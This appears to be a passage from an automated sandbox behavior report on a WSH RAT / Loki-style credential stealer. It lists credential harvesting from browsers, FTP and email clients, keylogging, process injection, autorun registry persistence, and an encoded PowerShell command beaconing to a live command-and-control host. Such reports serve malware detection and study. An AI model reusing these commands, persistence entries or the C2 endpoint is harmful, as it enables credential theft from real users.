file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Login Data
file	C:\Users\test22\AppData\Local\Chromium\User Data
file	C:\Users\test22\AppData\Local\MapleStudio\ChromePlus\User Data
file	C:\Users\test22\AppData\Local\Yandex\YandexBrowser\User Data

Looks up the external IP address (1 event)

domain

ip-api.com

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\Temp\vOb.exe
file	C:\Users\test22\AppData\Local\Temp\Output.js

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (1 event)

cmdline

"Powershell.exe" -ExecutionPolicy Bypass -command xHpF2m2TxzO3qr4FIuPswPaRZvbKhAgsHoUgVc5c1AMOAI4xiJqOjlkD3YO/6qULkSENmFl3GsolqcGGkZrBbaRXVu7YY+n3wiyv8wS+UHUpwhx/IX6ZerqvTzuOLuRdO08npei7HwfH2wKRuaecB8P/FVecfW9FoWjF1A6O/68O0qK192cnIhUcctWjx/GW8ULXo/Un0WwvyWYxGKqhFtUjf6hQETjLzO/F68/W3GXggNfn4E0tbsHcWJ4Qs9QeauMywyAB+V1+9Uw+hcoLBpcocrYAhSqf6iaaMKaTanR4JlGBlD4IjJQmV1gvQRYmjDXbZawN8IgwRgaI+xcKtFjiFVvuA6CawFF5jzi4mENimIA39OD54y/zMb7idEh4oTy+f+VDOiQ16HbDvRyX1gv6ar2K+vNdRpiEk+FL75Dwi1y2R1DSLLrnXH75cn9Sxxkx16fkjltmZNwZYnnZc0VCbJz5PE8snBKcKUEemoAvDwcgj8rVX1tuhqqeYXrhP1hn6oaUpa8dLV9GkxPvUPm2U2PxYjlaVQk75pkxpaspctI89cBy4lXgWn0XYPaK1+WjxY5j1F5jeSb75FxuowoTWUXfk8j1s2KbANCsBuN3nd5227aIGAKGm+1kHAm/4MePOuLnj7mVqVrGuW9smZZvnluk2n2p0v6RGPmD818= 'C:\Users\test22\AppData\Local\Temp\vOb.exe' 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windows Audio.exe'

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\vOb.exe

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Oct. 19, 2023, 9:33 a.m.	thread_identifier: 2964 thread_handle: 0x0000025c process_identifier: 2960 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "Powershell.exe" -ExecutionPolicy Bypass -command xHpF2m2TxzO3qr4FIuPswPaRZvbKhAgsHoUgVc5c1AMOAI4xiJqOjlkD3YO/6qULkSENmFl3GsolqcGGkZrBbaRXVu7YY+n3wiyv8wS+UHUpwhx/IX6ZerqvTzuOLuRdO08npei7HwfH2wKRuaecB8P/FVecfW9FoWjF1A6O/68O0qK192cnIhUcctWjx/GW8ULXo/Un0WwvyWYxGKqhFtUjf6hQETjLzO/F68/W3GXggNfn4E0tbsHcWJ4Qs9QeauMywyAB+V1+9Uw+hcoLBpcocrYAhSqf6iaaMKaTanR4JlGBlD4IjJQmV1gvQRYmjDXbZawN8IgwRgaI+xcKtFjiFVvuA6CawFF5jzi4mENimIA39OD54y/zMb7idEh4oTy+f+VDOiQ16HbDvRyX1gv6ar2K+vNdRpiEk+FL75Dwi1y2R1DSLLrnXH75cn9Sxxkx16fkjltmZNwZYnnZc0VCbJz5PE8snBKcKUEemoAvDwcgj8rVX1tuhqqeYXrhP1hn6oaUpa8dLV9GkxPvUPm2U2PxYjlaVQk75pkxpaspctI89cBy4lXgWn0XYPaK1+WjxY5j1F5jeSb75FxuowoTWUXfk8j1s2KbANCsBuN3nd5227aIGAKGm+1kHAm/4MePOuLnj7mVqVrGuW9smZZvnluk2n2p0v6RGPmD818= 'C:\Users\test22\AppData\Local\Temp\vOb.exe' 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windows Audio.exe' filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000264	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 19, 2023, 9:33 a.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Oct. 19, 2023, 9:33 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Oct. 19, 2023, 9:33 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (13 events)

description	Escalate priviledges	rule	Escalate_priviledges
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Win32 PWS Loki	rule	Win32_PWS_Loki_m_Zero
description	Run a KeyLogger	rule	KeyLogger

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	select * from win32_logicaldisk

Wscript.exe initiated network communications indicative of a script based payload download (42 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW Oct. 19, 2023, 9:32 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
InternetCrackUrlW Oct. 19, 2023, 9:32 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:32 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /json/	1	13369356
InternetCrackUrlA Oct. 19, 2023, 9:33 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
InternetReadFile Oct. 19, 2023, 9:33 a.m.	buffer: {"status":"success","country":"South Korea","countryCode":"KR","region":"11","regionName":"Seoul","city":"Songpa-gu","zip":"058","lat":37.5024,"lon":127.123,"timezone":"Asia/Seoul","isp":"Korea Telecom","org":"Kornet","as":"AS4766 Korea Telecom","query":"175.208.134.152"} request_handle: 0x00cc000c	1	1
HttpOpenRequestW Oct. 19, 2023, 9:33 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 19, 2023, 9:33 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:33 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 19, 2023, 9:33 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:33 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 19, 2023, 9:33 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:33 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 19, 2023, 9:33 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:33 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 19, 2023, 9:33 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:33 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 19, 2023, 9:33 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:33 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 19, 2023, 9:33 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:33 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 19, 2023, 9:33 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:33 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 19, 2023, 9:33 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:33 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 19, 2023, 9:34 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:34 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 19, 2023, 9:34 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:34 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 19, 2023, 9:34 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:34 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 19, 2023, 9:34 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:34 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 19, 2023, 9:34 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:34 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 19, 2023, 9:34 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:34 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 19, 2023, 9:34 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:34 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 19, 2023, 9:34 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:34 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW Oct. 19, 2023, 9:34 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:34 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 3040 region_size: 270336 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000026c	1	0	0

A process attempted to delay the analysis task. (1 event)

description

vOb.exe tried to sleep 2728230 seconds, actually delayed analysis time by 2728230 seconds

Installs itself for autorun at Windows startup (40 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\oneone	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\oneone.js"

Drops a binary and executes it (2 events)

file	C:\Users\test22\AppData\Local\Temp\Output.js
file	C:\Users\test22\AppData\Local\Temp\vOb.exe

Harvests credentials from local FTP client softwares (5 events)

file	C:\Users\test22\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect
file	C:\Users\test22\AppData\Roaming\FTPGetter\servers.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
registry	HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
registry	HKEY_CURRENT_USER\SOFTWARE\FTPWare\COREFTP\Sites

Executes one or more WMI queries (3 events)

wmi	select * from antivirusproduct
wmi	select * from win32_operatingsystem
wmi	select * from win32_logicaldisk

Potential code injection by writing to the memory of another process (4 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Oct. 19, 2023, 9:33 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELä,eàº.Ù à@ @ÔØWàF H.text4¹ º `.rsrcFà¼@@.relocÂ@B base_address: 0x00400000 process_identifier: 3040 process_handle: 0x0000026c	1	1
WriteProcessMemory Oct. 19, 2023, 9:33 a.m.	buffer: P8h à¼\ãê¼4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°StringFileInfoø000004b0,FileDescription 0FileVersion1.0.0.0t)InternalName1e9bd1a1-0255-447f-9c56-5c2d543f960b.exe(LegalCopyright \|)OriginalFilename1e9bd1a1-0255-447f-9c56-5c2d543f960b.exe4ProductVersion1.0.0.08Assembly Version1.0.0.0ï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0043e000 process_identifier: 3040 process_handle: 0x0000026c	1	1
WriteProcessMemory Oct. 19, 2023, 9:33 a.m.	buffer: Ð09 base_address: 0x00440000 process_identifier: 3040 process_handle: 0x0000026c	1	1
WriteProcessMemory Oct. 19, 2023, 9:33 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 3040 process_handle: 0x0000026c	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Oct. 19, 2023, 9:33 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELä,eàº.Ù à@ @ÔØWàF H.text4¹ º `.rsrcFà¼@@.relocÂ@B base_address: 0x00400000 process_identifier: 3040 process_handle: 0x0000026c	1	1	0

Creates a windows hook that monitors keyboard input (keylogger) (1 event)

Time & API	Arguments	Status	Return	Repeated
SetWindowsHookExA Oct. 19, 2023, 9:33 a.m.	thread_identifier: 0 callback_function: 0x008e08ca hook_identifier: 13 (WH_KEYBOARD_LL) module_address: 0x00400000	1	131331	0

Harvests credentials from local email clients (5 events)

file	C:\Users\test22\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect
file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
registry	HKEY_CURRENT_USER\Software\RimArts\B2\Settings

wscript.exe-based dropper (JScript, VBS) (20 events)

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (50 out of 101 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW Oct. 19, 2023, 9:32 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
InternetCrackUrlW Oct. 19, 2023, 9:32 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:32 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /json/	1	13369356
send Oct. 19, 2023, 9:32 a.m.	buffer: ! socket: 1176 sent: 1	1	1
send Oct. 19, 2023, 9:33 a.m.	buffer: GET /json/ HTTP/1.1 Accept: / Accept-Language: ko User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Accept-Encoding: gzip, deflate Host: ip-api.com Connection: Keep-Alive socket: 1232 sent: 259	1	259
send Oct. 19, 2023, 9:33 a.m.	buffer: ! socket: 1176 sent: 1	1	1
InternetCrackUrlA Oct. 19, 2023, 9:33 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:33 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Oct. 19, 2023, 9:33 a.m.	buffer: ! socket: 1176 sent: 1	1	1
send Oct. 19, 2023, 9:33 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 19/10/2023\|JavaScript-v2.0\|KR:South Korea Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1248 sent: 342	1	342
send Oct. 19, 2023, 9:33 a.m.	buffer: ! socket: 1176 sent: 1	1	1
InternetCrackUrlW Oct. 19, 2023, 9:33 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:33 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Oct. 19, 2023, 9:33 a.m.	buffer: ! socket: 1176 sent: 1	1	1
send Oct. 19, 2023, 9:33 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 19/10/2023\|JavaScript-v2.0\|KR:South Korea Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1272 sent: 342	1	342
send Oct. 19, 2023, 9:33 a.m.	buffer: ! socket: 1176 sent: 1	1	1
InternetCrackUrlW Oct. 19, 2023, 9:33 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:33 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Oct. 19, 2023, 9:33 a.m.	buffer: ! socket: 1176 sent: 1	1	1
send Oct. 19, 2023, 9:33 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 19/10/2023\|JavaScript-v2.0\|KR:South Korea Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 644 sent: 342	1	342
send Oct. 19, 2023, 9:33 a.m.	buffer: ! socket: 1176 sent: 1	1	1
InternetCrackUrlW Oct. 19, 2023, 9:33 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:33 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Oct. 19, 2023, 9:33 a.m.	buffer: ! socket: 1176 sent: 1	1	1
send Oct. 19, 2023, 9:33 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 19/10/2023\|JavaScript-v2.0\|KR:South Korea Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 652 sent: 342	1	342
send Oct. 19, 2023, 9:33 a.m.	buffer: ! socket: 1176 sent: 1	1	1
InternetCrackUrlW Oct. 19, 2023, 9:33 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:33 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Oct. 19, 2023, 9:33 a.m.	buffer: ! socket: 1176 sent: 1	1	1
send Oct. 19, 2023, 9:33 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 19/10/2023\|JavaScript-v2.0\|KR:South Korea Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 652 sent: 342	1	342
send Oct. 19, 2023, 9:33 a.m.	buffer: ! socket: 1176 sent: 1	1	1
InternetCrackUrlW Oct. 19, 2023, 9:33 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:33 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Oct. 19, 2023, 9:33 a.m.	buffer: ! socket: 1176 sent: 1	1	1
